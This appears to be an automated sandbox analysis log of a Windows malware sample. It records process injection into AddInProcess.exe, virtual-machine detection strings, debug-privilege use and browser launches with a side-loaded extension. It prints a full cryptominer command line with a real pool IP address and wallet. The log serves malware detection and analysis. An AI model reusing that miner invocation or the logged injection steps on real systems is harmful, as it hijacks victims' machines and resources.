Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 58999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199955	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1198910	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599777	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59867	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59529	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59287	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598652	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59840	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59733	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59379	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59261	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597543	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59859	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4I
Source: svchost.exe, 00000007.00000002.4113805548.000001CC7745A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.4112259937.000001CC71E2B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Thread register set: target process: 7492

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 3C1DA89010	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Queries volume information: C:\Users\user\Desktop\zlONcFaXkc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Queries volume information: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Code function: 20_2_0000000140348448 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_0000000140348448

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

